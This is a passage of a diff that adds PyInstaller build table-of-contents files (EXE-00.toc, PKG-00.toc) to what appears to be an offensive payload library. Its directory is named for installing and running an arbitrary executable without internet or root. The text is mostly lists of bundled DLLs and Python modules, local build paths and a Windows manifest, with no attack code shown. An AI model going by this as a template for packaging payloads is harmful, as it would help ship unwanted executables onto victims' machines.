+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-utility-l1-1-0.dll',
+   'BINARY')],
+ [],
+ [],
+ [('base_library.zip',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\base_library.zip',
+   'DATA')],
+ [])

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/build/example/EXE-00.toc

@@ -0,0 +1,261 @@
+('C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+ 'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\dist\\example.exe',
+ True,
+ False,
+ False,
+ 'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\PyInstaller\\bootloader\\images\\icon-console.ico',
+ None,
+ False,
+ False,
+ '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity type="win32" name="example" processorArchitecture="amd64" version="1.0.0.0"/><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" language="*" processorArchitecture="*" version="6.0.0.0" publicKeyToken="6595b64144ccf1df"/></dependentAssembly></dependency><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/></application></compatibility><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware></windowsSettings></application></assembly>',
+ True,
+ True,
+ False,
+ None,
+ None,
+ None,
+ 'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+ 'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\example.pkg',
+ [('PYZ-00.pyz',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\PYZ-00.pyz',
+   'PYZ'),
+  ('struct',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\localpycs\\struct.pyc',
+   'PYMODULE'),
+  ('pyimod01_archive',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\localpycs\\pyimod01_archive.pyc',
+   'PYMODULE'),
+  ('pyimod02_importers',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\localpycs\\pyimod02_importers.pyc',
+   'PYMODULE'),
+  ('pyimod03_ctypes',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\localpycs\\pyimod03_ctypes.pyc',
+   'PYMODULE'),
+  ('pyimod04_pywin32',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\localpycs\\pyimod04_pywin32.pyc',
+   'PYMODULE'),
+  ('pyiboot01_bootstrap',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\PyInstaller\\loader\\pyiboot01_bootstrap.py',
+   'PYSOURCE'),
+  ('pyi_rth_inspect',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\PyInstaller\\hooks\\rthooks\\pyi_rth_inspect.py',
+   'PYSOURCE'),
+  ('example',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\example.py',
+   'PYSOURCE'),
+  ('api-ms-win-crt-runtime-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-runtime-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-math-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-math-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-stdio-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-stdio-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-heap-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-heap-l1-1-0.dll',
+   'BINARY'),
+  ('VCRUNTIME140.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\VCRUNTIME140.dll',
+   'BINARY'),
+  ('api-ms-win-crt-locale-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-locale-l1-1-0.dll',
+   'BINARY'),
+  ('python311.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\python311.dll',
+   'BINARY'),
+  ('ucrtbase.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\ucrtbase.dll',
+   'BINARY'),
+  ('api-ms-win-crt-convert-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-convert-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-string-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-string-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-filesystem-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-filesystem-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-process-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-process-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-conio-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-conio-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-time-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-time-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-environment-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-environment-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-namedpipe-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-namedpipe-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-util-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-util-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-localization-l1-2-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-localization-l1-2-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-processthreads-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-processthreads-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-file-l2-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-file-l2-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-memory-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-memory-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-file-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-file-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-rtlsupport-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-rtlsupport-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-file-l1-2-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-file-l1-2-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-errorhandling-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-errorhandling-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-synch-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-synch-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-synch-l1-2-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-synch-l1-2-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-sysinfo-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-sysinfo-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-processenvironment-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-processenvironment-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-handle-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-handle-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-timezone-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-timezone-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-datetime-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-datetime-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-profile-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-profile-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-heap-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-heap-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-processthreads-l1-1-1.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-processthreads-l1-1-1.dll',
+   'BINARY'),
+  ('api-ms-win-core-interlocked-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-interlocked-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-string-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-string-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-libraryloader-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-libraryloader-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-console-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-console-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-debug-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-debug-l1-1-0.dll',
+   'BINARY'),
+  ('_decimal.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_decimal.pyd',
+   'EXTENSION'),
+  ('_hashlib.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_hashlib.pyd',
+   'EXTENSION'),
+  ('_lzma.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_lzma.pyd',
+   'EXTENSION'),
+  ('_bz2.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_bz2.pyd',
+   'EXTENSION'),
+  ('select.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\select.pyd',
+   'EXTENSION'),
+  ('_socket.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_socket.pyd',
+   'EXTENSION'),
+  ('unicodedata.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\unicodedata.pyd',
+   'EXTENSION'),
+  ('_ssl.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_ssl.pyd',
+   'EXTENSION'),
+  ('_ctypes.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_ctypes.pyd',
+   'EXTENSION'),
+  ('libcrypto-1_1.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\libcrypto-1_1.dll',
+   'BINARY'),
+  ('libssl-1_1.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\libssl-1_1.dll',
+   'BINARY'),
+  ('libffi-8.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\libffi-8.dll',
+   'BINARY'),
+  ('api-ms-win-crt-utility-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-utility-l1-1-0.dll',
+   'BINARY'),
+  ('base_library.zip',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\base_library.zip',
+   'DATA')],
+ [],
+ False,
+ False,
+ 1686733392,
+ [('run.exe',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\PyInstaller\\bootloader\\Windows-64bit-intel\\run.exe',
+   'EXECUTABLE')])

payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/assets/build/example/PKG-00.toc

@@ -0,0 +1,253 @@
+('C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+ 'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\example.pkg',
+ {'BINARY': True,
+  'DATA': True,
+  'EXECUTABLE': True,
+  'EXTENSION': True,
+  'PYMODULE': True,
+  'PYSOURCE': True,
+  'PYZ': False,
+  'SPLASH': True},
+ [('PYZ-00.pyz',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\PYZ-00.pyz',
+   'PYZ'),
+  ('struct',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\localpycs\\struct.pyc',
+   'PYMODULE'),
+  ('pyimod01_archive',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\localpycs\\pyimod01_archive.pyc',
+   'PYMODULE'),
+  ('pyimod02_importers',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\localpycs\\pyimod02_importers.pyc',
+   'PYMODULE'),
+  ('pyimod03_ctypes',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\localpycs\\pyimod03_ctypes.pyc',
+   'PYMODULE'),
+  ('pyimod04_pywin32',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\build\\example\\localpycs\\pyimod04_pywin32.pyc',
+   'PYMODULE'),
+  ('pyiboot01_bootstrap',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\PyInstaller\\loader\\pyiboot01_bootstrap.py',
+   'PYSOURCE'),
+  ('pyi_rth_inspect',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\PyInstaller\\hooks\\rthooks\\pyi_rth_inspect.py',
+   'PYSOURCE'),
+  ('example',
+   'C:\\Users\\Aleff\\Documents\\GitHub\\tmp\\TODO '
+   'Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed\\assets\\example.py',
+   'PYSOURCE'),
+  ('api-ms-win-crt-runtime-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-runtime-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-math-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-math-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-stdio-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-stdio-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-heap-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-heap-l1-1-0.dll',
+   'BINARY'),
+  ('VCRUNTIME140.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\VCRUNTIME140.dll',
+   'BINARY'),
+  ('api-ms-win-crt-locale-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-locale-l1-1-0.dll',
+   'BINARY'),
+  ('python311.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\python311.dll',
+   'BINARY'),
+  ('ucrtbase.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\ucrtbase.dll',
+   'BINARY'),
+  ('api-ms-win-crt-convert-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-convert-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-string-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-string-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-filesystem-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-filesystem-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-process-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-process-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-conio-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-conio-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-time-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-time-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-crt-environment-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-crt-environment-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-namedpipe-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-namedpipe-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-util-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-util-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-localization-l1-2-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-localization-l1-2-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-processthreads-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-processthreads-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-file-l2-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-file-l2-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-memory-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-memory-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-file-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-file-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-rtlsupport-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-rtlsupport-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-file-l1-2-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-file-l1-2-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-errorhandling-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-errorhandling-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-synch-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-synch-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-synch-l1-2-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-synch-l1-2-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-sysinfo-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-sysinfo-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-processenvironment-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-processenvironment-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-handle-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-handle-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-timezone-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-timezone-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-datetime-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-datetime-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-profile-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-profile-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-heap-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-heap-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-processthreads-l1-1-1.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-processthreads-l1-1-1.dll',
+   'BINARY'),
+  ('api-ms-win-core-interlocked-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-interlocked-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-string-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-string-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-libraryloader-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-libraryloader-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-console-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-console-l1-1-0.dll',
+   'BINARY'),
+  ('api-ms-win-core-debug-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
+   'Adoptium\\jdk-17.0.7.7-hotspot\\bin\\api-ms-win-core-debug-l1-1-0.dll',
+   'BINARY'),
+  ('_decimal.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_decimal.pyd',
+   'EXTENSION'),
+  ('_hashlib.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_hashlib.pyd',
+   'EXTENSION'),
+  ('_lzma.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_lzma.pyd',
+   'EXTENSION'),
+  ('_bz2.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_bz2.pyd',
+   'EXTENSION'),
+  ('select.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\select.pyd',
+   'EXTENSION'),
+  ('_socket.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_socket.pyd',
+   'EXTENSION'),
+  ('unicodedata.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\unicodedata.pyd',
+   'EXTENSION'),
+  ('_ssl.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_ssl.pyd',
+   'EXTENSION'),
+  ('_ctypes.pyd',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\_ctypes.pyd',
+   'EXTENSION'),
+  ('libcrypto-1_1.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\libcrypto-1_1.dll',
+   'BINARY'),
+  ('libssl-1_1.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\libssl-1_1.dll',
+   'BINARY'),
+  ('libffi-8.dll',
+   'C:\\Users\\Aleff\\AppData\\Local\\Programs\\Python\\Python311\\DLLs\\libffi-8.dll',
+   'BINARY'),
+  ('api-ms-win-crt-utility-l1-1-0.dll',
+   'C:\\Program Files\\Eclipse '
